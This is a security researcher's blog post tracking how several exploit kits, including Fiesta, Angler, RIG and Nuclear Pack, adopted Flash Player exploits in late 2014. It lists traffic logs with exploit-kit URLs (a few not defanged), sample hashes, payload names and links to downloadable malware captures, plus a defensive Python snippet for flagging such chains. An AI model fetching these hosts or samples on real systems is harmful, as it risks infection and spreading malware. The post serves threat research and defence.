2014-10-21
CVE-2014-0569 (Flash Player) integrating Exploit Kit
<This post has been edited multiple times to fix some errors and bring in new elements. It may still be changed.>
My goal was to grab CVE-2014-0556 when I landed on Fiesta yesterday, but according to @TimoHirvonen it is CVE-2014-0569, fixed only one week ago, that has been fired here. That is a really fast integration into an exploit kit. I have been told it landed in Fiesta after its coder reversed the patch (in 2 days).
So you know what to do: ensure Flash Player is up to date (15.0.0.189; for IE10/IE11 users the patch to check is KB3001237).
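As a defender-side illustration added here (not code from the post), the following Python does the two checks the post implies: it compares an installed Flash version against the 15.0.0.189 build named above, and it walks a capture written in the post's own request/response format to flag hosts that serve a landing page, then a SWF, then a binary, which is the sequence every pass in the post shows. The host names and the capture itself are constructed placeholders.

```python
import re
PATCHED_FLASH = (15, 0, 0, 189)  # fixed build named in the post

def flash_is_vulnerable(version):
    # Accepts "15.0.0.152" and the "15,0,0,152" form Flash itself reports
    parts = re.split(r"[.,]", version.strip())
    if len(parts) != 4 or not all(p.isdigit() for p in parts):
        raise ValueError("unexpected Flash version: %r" % version)
    return tuple(int(p) for p in parts) < PATCHED_FLASH

# Request/response lines in the post's format; " .tld" defanging is undone below
REQ_RE = re.compile(r"^(GET|POST)\s+https?://([^/\s]+(?:\s\.[^/\s]+)?)")
RESP_RE = re.compile(r"^\d{3}\s+[A-Za-z ]+\(([^)]+)\)")

def parse_sessions(capture):
    # Pair each request with the response line that follows it -> (host, mime)
    sessions, host = [], None
    for line in capture.splitlines():
        req = REQ_RE.match(line)
        if req:
            host = req.group(2).replace(" ", "")
            continue
        resp = RESP_RE.match(line)
        if resp and host is not None:
            sessions.append((host, resp.group(1).strip()))
            host = None
    return sessions

# Landing page -> SWF -> binary payload, the order seen in every pass in the post
STAGES = (("text/html",), ("application/x-shockwave-flash",),
          ("application/octet-stream", "application/x-msdownload"))

def flag_ek_chains(sessions):
    # Flag a host once it served all three stages in order; other MIME types in between do not reset it
    progress, flagged = {}, []
    for host, mime in sessions:
        stage = progress.get(host, 0)
        if stage < len(STAGES) and mime in STAGES[stage]:
            progress[host] = stage + 1
            if stage + 1 == len(STAGES):
                flagged.append(host)
    return flagged

# Constructed capture modelled on the Fiesta pass; hosts are placeholders
SAMPLE_CAPTURE = """GET http://ek-landing.example .org/land
200 OK (text/html)
GET http://ek-landing.example .org/cp/1
200 OK (application/x-shockwave-flash)
GET http://ek-landing.example .org/cp/2
200 OK (application/octet-stream)"""
```

Run against a proxy log exported in this shape, the flagged hosts are the ones worth pulling the SWF and payload hashes for.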
Fiesta :
CVE-2014-0569 successful pass in Fiesta EK 2014-10-21 (Fiesta logo courtesy of FoxIT)
GET http://rvdcgyisqy.myftp .org/jjcv7antdqqollz6mqusrbwjcu3z1835zzuurupwvyxdsy
200 OK (text/html)
"Relevant section from Fiesta landing page: http://pastebin.com/K4gbQWpS" (by Jason, in comments)
GET http://rvdcgyisqy.myftp .org/cp9ne2q/4f25f1a50659fee801500b0e540a50040053040e5253510e0152060357535850;150000;144
200 OK (application/x-shockwave-flash) 254690dd89055c46f1a60713dbc26965 CVE-2014-0569
GET http://rvdcgyisqy.myftp .org/cp9ne2q/55cd3f2a4a3ae27c5645085f015d03500100555f0704025a0001575202040b04;7
200 OK (application/octet-stream) 2b74a966466d612b069161b4fdd0f775 Payload: Ropest (thanks @Horgh_rce)
GET http://rvdcgyisqy.myftp .org/cp9ne2q/55cd3f2a4a3ae27c5645085f015d03500100555f0704025a0001575202040b04;7;1
200 OK (text/html)
Files: Nothing yet.
Fiddler sent to VT here: 9bb6292633f4eccd54aeb23ad3555507

Angler EK :
[Edit 2014-10-22: It appears this could be another CVE (0558 or 0564, or something else killed by the last update) than CVE-2014-0569. I am asking for help in figuring it out.] [Edit 2014-11-25: So the CVE here is in fact CVE-2014-8439. See the post by F-Secure.]
Followed by Bedep activity and a Zeus variant. Edit 2014-11-25: CVE-2014-8439. Edit 2014-12-21: Kaspersky Lab named that Zeus variant Chthonic.
GET http://three.creziontyro .in/qsx0jugfgk
200 OK (text/html) After a first pass of deobfuscation: http://pastebin.com/tnRKArFz (thanks as always to @EKWatcher). Update coming later, maybe.
GET http://three.creziontyro .in/J-XQctybYriag-bOGIcSDh-HchIdpmXKk_M52H6bO6Y7NsJMsSIWWvNTG-R0tdBR
200 OK (application/x-shockwave-flash) d54a6cca8b6b52f6ed47769ba6397444 CVE-2014-xxxx
GET http://three.creziontyro .in/KxYioLx6A_QJguVdGPUpkrc6lJWbIWICBCyS8LR7X3pDLnTugBkW7GVC1vXjAtFj
200 OK (application/octet-stream) Stream containing shellcode and Bedep.
Target payload: 831098a9d8db43bebf3d6ee67914888d Kins variant (thanks to @maciekkotowicz, who wrote about it on Kernelmode)
Files: Fiddler sent to VT here: 6c0cd2dae5c43f92d86411977bb28b08

Astrum EK :
So Astrum is owning Flash 15.0.0.152. It seems the same undefined CVE (fixed 10 days ago by the last Flash Player patch) used in Angler EK is being used here as well. [Edit 2014-11-25: The CVE here is in fact CVE-2014-8439. See the post by F-Secure.]
Astrum EK exploiting Flash 15.0.0.152 to push Miuref AdFraud, 2014-10-24. Edit 2014-11-25: CVE-2014-8439.
(Once again... sorry, I do not have enough time yet to study this in detail.)
GET http://b.kok44 .com/qtzscn6d2vyrp.html
200 OK (text/html)
POST http://b.kok44 .com/nlPPOoTJIWP0MPcC66tPW6E881Kxrk4JpG3zUe7-T16vY_BTuvYfUu118wO64AEI8g..
404 Not Found (text/html)
GET http://b.kok44 .com/qtzscn6d2vyrp.html
200 OK (text/html)
POST http://b.kok44 .com/YYclWjoL_Ppe6BRhUmbCkQ7uSWFZaMeRW-0UZ1I9lZYMvEtmAjeXkRKhGWMEItyRDQ..
200 OK (text/html)
GET http://b.kok44 .com/iajJ15EwZW62x_js-V1bBebBpezyU14Fs8L46vkGDALkk6frqQwOBfqO9eysGUUF5Q..
200 OK (application/x-shockwave-flash) 99a8b37fcd995f859e2b7e22ce8fe72b CVE-2014-05xx ??
GET http://b.kok44 .com/pYU3o8dIJ8ma6gaYryUZosrsW5ikKxyin-8Gnq9-TqXIvlmf_3RMotajC5j1YQeiyQ..
200 OK (application/octet-stream) After deobfuscation: 3ef89107362630d2ad56e7bef5a717fc Miuref AdFraud (cf. form. Partnerka.me)
Files: Nothing yet.
Fiddler sent to VT here: 5e9abc8ef40bb98afb00e40f12958919

Sweet Orange :
@kafeine Sweet Orange EK also uses the CVE-2014-0569.
— Simon Choi (@issuemakerslab) October 28, 2014
A pass with Firefox and Flash 15.0.0.152 seems to confirm that. CVE-2014-0569 confirmed by Kaspersky. Simon Choi told me he also got a successful pass with IE 11 / Flash 15.0.0.167 on Windows 8.
GET http://pirat.svanager.wielun .pl:8080/elements/film.php?london=274412&desktop=209908&advocacy=17&bloggers=22666&free=56481&articles=178642&other=287691
200 OK (text/html)
GET http://pirat.svanager.wielun .pl:8080/elements/xrbolXSHx
200 OK (application/x-shockwave-flash) 6d5591ef4d3ddb1c0b47d52a58e36036
GET http://pirat.svanager.wielun.pl:8080/backup.php?lang=1341&topics=12&voip=505&myguest=1251&math=1377&down=2386&game=2511
200 OK (application/octet-stream) Kovter bc8e0c39cc66da9c2caee65bd3a70882
Files: Soon, after Nuclear Pack integration.

Flash EK :
CVE-2014-0569 fired by a "full" Flash EK on 2014-10-28
GET http://tinsinarbetrab .eu/xs3884y132186/index.php
200 OK (text/html)
GET http://tinsinarbetrab .eu/xs3884y132186/js/swfobject.js
200 OK (application/javascript)
GET http://tinsinarbetrab .eu/xs3884y132186/banner.swf
200 OK (application/x-shockwave-flash) Filtering advert 8124c71afe59779e181c52857f990103
POST http://tinsinarbetrab .eu/xs3884y132186/gate.php
200 OK (text/html)
GET http://tinsinarbetrab .eu/xs3884y132186/Main.swf
200 OK (application/x-shockwave-flash) 93bd68ff7112244d19030d360e9b2108 CVE-2014-0569 identified by Timo Hirvonen
GET http://tinsinarbetrab .eu/xs3884y132186/lofla1.php
200 OK (application/octet-stream) Necurs 96f0f62f798987fb0dd3427182775ef7
Files: Soon.

RIG :
Successful pass in RIG for CVE-2014-0569, 2014-11-06 (inside since 2014-11-04)
GET http://blog.dwightdavisarchitect .net/?PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg|YTUyZTE1NjA3NGM0NGQzNmJiMTg4ZDZkNjVmMWE2YTA
200 OK (text/html)
GET http://blog.dwightdavisarchitect .net/index.php?req=swf&num=174&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg|YTUyZTE1NjA3NGM0NGQzNmJiMTg4ZDZkNjVmMWE2YTA
200 OK (application/x-shockwave-flash) 28edb6d99e80823b22b28c7d6fb5106999d7df4365d547c64b7dfd4973cb95a0 CVE-2014-0569. Confirmation by Kaspersky Lab.
GET http://blog.dwightdavisarchitect .net/index.php?req=mp3&num=72237&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg%7CYTUyZTE1NjA3NGM0NGQzNmJiMTg4ZDZkNjVmMWE2YTA
200 OK (application/x-msdownload) <- Glupteba.
File: RIG_2014-11-06.zip (Owncloud)

Nuclear Pack :
Same exploit as in Astrum according to @TimoHirvonen.
[Edit 2014-11-25: The CVE here is in fact CVE-2014-8439. See the post by F-Secure.]
Nuclear Pack exploiting Flash 15.0.0.152 to push Kelihos Loader. Edit 2014-11-25: CVE-2014-8439.
GET http://mienzamicherdoekno .co.vu/61c4895bc2uuv.html
200 OK (text/html)
Piece of code to filter the Flash version on the decoded landing: http://pastebin.com/BFxrTZiF
GET http://mienzamicherdoekno .co.vu/f285e22b4bcac2uuv/1415616660
200 OK (application/octet-stream) - e5dc40303049ecbffabfd47fc4b92809
Despite the debug string, according to Timo and Kaspersky, as in Astrum and Angler EK, it is not CVE-2014-0569.
GET http://mienzamicherdoekno .co.vu/f285e22bc2uuv/1415616660/7
200 OK (application/octet-stream) - 275bcc790883204f559852bd9a6e74f4 Kelihos Loader
GET http://mienzamicherdoekno.co.vu/f285e22bc2uuv/1415616660/7/2
200 OK (application/octet-stream) Empty
Files: Nuclear Pack_2014-11-10.zip

Null Hole :
Call me Null Hole maybe?

Archie :
CVE identification by Anton Ivanov (Kaspersky) (thanks)
CVE-2014-0569 fired by Archie, 2014-11-18
Files: Fiddler & Flash (password is: malware)

Magnitude :
Thanks to Timo Hirvonen for the CVE identification, and to Will Metcalf and EKWatcher for allowing that pass.
Magnitude successfully firing CVE-2014-8439 ("downgraded") against Flash 15.0.0.152, 2014-12-03
Sample: f5e3ce7da019cf38dc3982f9f323aee2
Files: Fiddler and Flash: Magnitude_2014-12-03.zip

Post publication Readings :
Cracking the CVE-2014-0569 nutshell - Chun Feng - Microsoft Protection Center - 2014-11-06